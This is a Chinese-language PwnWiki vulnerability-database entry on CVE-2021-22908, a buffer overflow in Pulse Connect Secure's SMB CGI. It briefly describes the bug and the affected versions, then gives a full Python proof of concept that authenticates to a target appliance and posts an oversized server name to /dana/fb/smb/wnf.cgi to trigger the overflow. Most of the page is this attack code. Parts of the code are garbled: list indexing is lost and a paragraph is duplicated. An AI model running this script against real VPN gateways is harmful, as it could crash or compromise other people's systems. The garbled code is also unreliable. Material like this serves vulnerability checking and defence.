Loading
0

CVE-2021-22908 Pulse Connect Secure 任意代码执行漏洞/zh-cn

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

漏洞描述

由于PCS支持连接到Windows文件共享(SMB)的功能由基于Samba 4.5.10的库和辅助应用程序的CGI脚本提供。当为某些SMB操作指定一个长的服务器名称时,smbclt应用程序可能会由于缓冲区溢出而崩溃,具体取决于指定的服务器名称长度。

已经确认PCS 9.1R11.4系统存在此漏洞,目标CGI端点为/dana/fb/smb/wnf.cgi,其它CGI端点也可能会触发此漏洞。

如果攻击者在成功利用此漏洞后没有进行清理,则指定一个长的服务器名称可能会导致如下PCS事件日志条目:

Critical ERR31093 2021-05-24 14:05:37 - ive - 127.0.0.1 Root::System() - Program smbclt recently failed.

如果攻击者在成功利用此漏洞后没有进行清理,则指定一个长的服务器名称可能会导致如下PCS事件日志条目:

影响范围

Pulse Connect Secure 9.0RX and 9.1RX

POC

#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass

parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname)')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')

args = parser.parse_args()

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class formvaluefinder(HTMLParser):
    def __init__(self, searchval):
        super(type (self), self).__init__()
        self.searchval = searchval
    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            # We're just looking for form <input> tags
            foundelement = False
            for attr in attrs:
                if(attr0 == 'name'):
                    if(attr1 == self.searchval):
                        foundelement = True
                elif(attr0 == 'value' and foundelement == True):
                     self.data = attr1

class preauthfinder(HTMLParser):
    foundelement = False
    def handle_starttag(self, tag, attrs):
        if tag == 'textarea':
            # We're just looking for <textarea> tags
            foundelement = False
            for attr in attrs:
                if(attr0 == 'id'):
                    if(attr1 == 'sn-preauth-text_2'):
                        self.foundelement = True
    def handle_data(self, data):
        if self.foundelement:
            self.data = data
            self.foundelement = False



def get_realm(host, defaulturi):
    realm = None
    print('Getting default realm for %s...' % host)
    url = 'https://%s%s' % (host,defaulturi)
    res = None
    try:
        res = requests.get(url, verify=False, timeout=10)
    except requests.exceptions.ConnectionError:
        print('Error retrieving %s' % url)

    if res:
        if res.status_code == 200:
            html = str(res.content)
            if 'sn-preauth-text_2' in html:
                print('Preauth required...')
                parser = preauthfinder()
                parser.feed(html)
                preauthtext = parser.data
                values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
                res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
                if res.content:
                    parser = formvaluefinder('realm')
                    parser.feed(str(res.content))
                    realm = parser.data
                else:
                    print('Error retrieving login page')

            else:
                parser = formvaluefinder('realm')
                parser.feed(html)
                realm = parser.data
    return realm

def get_dsid(host, defaulturi, realm, user, password):
    dsid = None
    loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
    url = 'https://%s%s' % (host,loginuri)
    values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
    res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
    if 'confirm' in res.headers'location':
        # Redirect to "user-confirm" that they still want to log in, despite already
        # having an active session
        print('User session is already active! Proceeding...')
        res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
        parser = formvaluefinder('FormDataStr')
        parser.feed(str(res.content))
        formdata = parser.data
        values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value
    elif 'cred' in res.headers'location':
        # This is a pulse that requires 2FA
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'id':
                key = cookie.value
        password2 = input('MFA code: ')
        values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
        cookies = {'id': key, 'DSSigninNotif': '1'}
        res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
        if 'confirm' in res.headers'location':
            # Redirect to "user-confirm" that they still want to log in, despite already
            # having an active session
            print('User session is already active! Proceeding...')
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            parser = formvaluefinder('FormDataStr')
            parser.feed(str(res.content))
            formdata = parser.data
            values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
        else:
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
    elif 'failed' in res.headers'location':
        print('Login failed!')
    else:
        # Login accepted
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value

    return dsid


def get_xsauth(host, dsid):
    xsauth = None
    url = 'https://%s/dana/home/index.cgi' % host
    cookies = {'DSID':dsid}
    res = requests.get(url, verify=False, cookies=cookies, timeout=10)
    if 'xsauth' in str(res.content):
        parser = formvaluefinder('xsauth')
        parser.feed(str(res.content))
        xsauth = parser.data
    else:
        print('Cannot find xsauth string for provided DSID: %s' % dsid)
    return xsauth

def trigger_vul(host, dsid, xsauth):
    url = 'https://%s/dana/fb/smb/wnf.cgi' % host
    values = {
        't': 's',
        'v': '%s,,' % ('A' * 1800),
        'dir': 'tmp',
        'si': None,
        'ri': None,
        'pi': None,
        'confirm': 'yes',
        'folder': 'tmp',
        'acttype': 'create',
        'xsauth': xsauth,
        'create': 'Create Folder',
        }
    cookies = {'DSID': dsid}
    try:
        res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
        status = res.status_code
        if 'DSIDFormDataStr' in str(res.content):
            # We got page asking to confirm our action
            print('xsauth value was not accepted')
        else:
            if status == 200 and 'Error FB-8' in str(res.content):
                print('HTTP %s.  Windows File Access Policies prevents exploitation.' % status)
            elif status == 200:
                print('HTTP %s.  Not vulnerable.' % status)
            elif status == 403:
                print('HTTP %s.  XML workaround applied.' % status)
            elif status == 500:
                print('HTTP %s.  %s is vulnerable to CVE-2021-22908!' % (status, host))
            elif status == 302:
                print('HTTP %s.  Are you sure your DSID is valid?' % host)
            else:
                print('HTTP %s.  Not sure how to interpret this result.' % status)
    except requests.exceptions.ReadTimeout:
        print('No response from server. Try again...')


def get_default(host):
    url = 'https://%s' % host
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    try:
        location = res.headers'location'
        if 'dana-na' not in location:
            print('%s does not seem to be a PCS host' % host)
            location = None
    except:
        pass
    return location

def check_xml(host):
    url = 'https://%s/dana/meeting' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2104 appears to be installed')
    else:
        print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')

    url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2105 appears to be installed')
    else:
        print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')


host = args.host
if args.noauth:
    check_xml(host)
else:
    defaulturi = get_default(host)
    if defaulturi:

        if not args.realm:
            realm = get_realm(host, defaulturi)
        else:
            realm = args.realm

        if realm:
            print('Realm: %s' % realm)
            if not args.user and not args.dsid:
                user = input('User: ')
            else:
                user = args.user
            if not args.password and not args.dsid:
                password = getpass.getpass()
            else:
                password = args.password
            if not args.dsid:
                dsid = get_dsid(host, defaulturi, realm, user, password)
                print('DSID: %s' % dsid)
            else:
                dsid = args.dsid
            if dsid:
                if not args.xsauth:
                    xsauth = get_xsauth(host, dsid)
                    print('xsauth: %s' % xsauth)
                else:
                    xsauth = args.xsauth
                if xsauth:
                    trigger_vul(host, dsid, xsauth)

PWNWIK.COM==免费、自由、人人可编辑的漏洞库